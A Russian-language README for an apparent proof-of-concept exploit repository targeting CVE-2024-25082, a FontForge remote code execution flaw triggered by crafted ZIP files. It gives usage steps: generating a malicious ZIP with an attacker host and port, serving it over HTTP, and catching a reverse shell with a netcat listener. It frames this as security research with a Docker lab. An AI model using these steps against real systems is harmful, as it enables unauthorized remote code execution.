
Эксплойт Proof-of-concept для CVE-2024-25082, демонстрирующий удаленное выполнение кода в FontForge через специально созданные ZIP-архивы. Включает генератор полезной нагрузки, лабораторию Docker и техническое описание для исследований в области безопасности и обучения.
Эксплойт Proof-of-Concept для CVE-2024-25082, уязвимости, затрагивающей FontForge, которая позволяет удаленное выполнение кода (RCE) через специально сформированный ZIP-архив.
Этот репозиторий демонстрирует, как уязвимость может быть эксплуатирована в контролируемой лабораторной среде для целей исследования безопасности и обучения.
Уязвимость возникает из-за неправильной проверки файлов внутри ZIP-архивов, что позволяет злоумышленнику выполнять произвольные команды на целевой системе.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
Файл Описание
exploit.py Создает вредоносный ZIP-загрузчик poc/ Содержит сгенерированные файлы доказательства концепции writeup.md Техническое объяснение уязвимости
Установка дополнительных инструментов:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
Это создаст вредоносный файл exploit.zip.
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
При успешном выполнении с целевой системы будет получена оболочка.
Воспроизводимая уязвимая среда предоставлена внутри каталога docker/.
Пример:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
Это позволяет безопасно тестировать без воздействия на рабочие системы.
Злоумышленник, способный загружать или контролировать ZIP-файлы, обрабатываемые уязвимым приложением, может:
Рекомендуемые меры смягчения:
Этот репозиторий содержит код Proof-of-Concept для публично раскрытой уязвимости.
Код предоставляется строго для:
НЕ используйте этот код против систем без явного разрешения.
Автор не несет никакой ответственности за неправомерное использование или ущерб, причиненный этим программным обеспечением.
Moamen Elmaghrabi
Студент по кибербезопасности
Тестирование на проникновение и разработка эксплойтов
Этот проект лицензирован под лицензией MIT.
Подробнее см. в файле LICENSE.